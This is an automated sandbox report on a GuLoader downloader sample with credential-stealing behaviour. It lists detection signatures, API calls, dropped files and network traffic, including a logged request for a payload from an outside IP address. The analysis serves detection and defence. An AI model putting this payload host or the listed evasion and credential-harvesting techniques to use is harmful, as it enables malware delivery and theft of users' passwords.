Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
99200032052824.bat.exe

Overview

General Information

Sample name:99200032052824.bat.exe
Analysis ID:1447846
MD5:085de7ac75bbd791c1b1f979fe8ff78c
SHA1:f33f25a99dbf0f7b9c2ad2bc886e7748cb5d888f
SHA256:f76bdeb70f9927c49aa87d92d92eb93d05317a3bde63da7a78a11033b29b41ab
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 99200032052824.bat.exe (PID: 8652 cmdline: "C:\Users\user\Desktop\99200032052824.bat.exe" MD5: 085DE7AC75BBD791C1B1F979FE8FF78C)
    • 99200032052824.bat.exe (PID: 7240 cmdline: "C:\Users\user\Desktop\99200032052824.bat.exe" MD5: 085DE7AC75BBD791C1B1F979FE8FF78C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: 99200032052824.bat.exe PID: 8652JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 99200032052824.bat.exeReversingLabs: Detection: 13%
        Source: 99200032052824.bat.exeVirustotal: Detection: 20%Perma Link
        Source: 99200032052824.bat.exeJoe Sandbox ML: detected
        Source: 99200032052824.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 99200032052824.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405768
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_004062A3 FindFirstFileA,FindClose,5_2_004062A3
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_004026FE FindFirstFileA,5_2_004026FE
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405768
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_004026FE FindFirstFileA,9_2_004026FE
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_004062A3 FindFirstFileA,FindClose,9_2_004062A3
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
        Source: unknownDNS query: name: ip-api.com
        Source: global trafficHTTP traffic detected: GET /LZJRCXHEEshk185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.11Cache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.11
        Source: global trafficHTTP traffic detected: GET /LZJRCXHEEshk185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.11Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ip-api.com
        Source: 99200032052824.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: 99200032052824.bat.exe, 00000005.00000000.1295915464666.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 99200032052824.bat.exe, 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,5_2_00405205
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040320C
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_0040320C
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_00404A445_2_00404A44
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_00406F545_2_00406F54
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_0040677D5_2_0040677D
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_73A31A985_2_73A31A98
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_00404A449_2_00404A44
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_00406F549_2_00406F54
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_0040677D9_2_0040677D
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_001690289_2_00169028
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_001688BB9_2_001688BB
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_001638F89_2_001638F8
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_001649109_2_00164910
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_0016C3609_2_0016C360
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_0016F6A09_2_0016F6A0
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_001640409_2_00164040
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_0016E98A9_2_0016E98A
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_375F77009_2_375F7700
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_375F86689_2_375F8668
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_375F26909_2_375F2690
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_375F1CA09_2_375F1CA0
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_375F37509_2_375F3750
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_375FA8809_2_375FA880
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_0016C6489_2_0016C648
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: String function: 00402ACB appears 48 times
        Source: 99200032052824.bat.exe, 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
        Source: 99200032052824.bat.exe, 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
        Source: 99200032052824.bat.exe, 00000009.00000002.1301021306350.0000000006DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 99200032052824.bat.exe
        Source: 99200032052824.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@3/23@1/2
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040320C
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_0040320C
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_004044D1 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_004044D1
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_004020D1 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,5_2_004020D1
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\BemangleJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeMutant created: NULL
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsxD41F.tmpJump to behavior
        Source: 99200032052824.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\99200032052824.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 99200032052824.bat.exeReversingLabs: Detection: 13%
        Source: 99200032052824.bat.exeVirustotal: Detection: 20%
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile read: C:\Users\user\Desktop\99200032052824.bat.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"Jump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
        Source: 99200032052824.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: Process Memory Space: 99200032052824.bat.exe PID: 8652, type: MEMORYSTR
        Source: Yara matchFile source: 00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_73A31A98
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_73A32F20 push eax; ret 5_2_73A32F4E
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\BemangleJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywortJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Nydannelses.AarJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Krapyls172.sygJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\parallelopipedon.idiJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Mattias.napJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\QuizsJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Sestertius.djvJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Slidsomt.braJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\afkontrollere.urbJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\StrandJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\afslres.tenJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\discomposed.nonJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\dred.jpgJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\gametophoric.txtJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\isocola.solJump to behavior
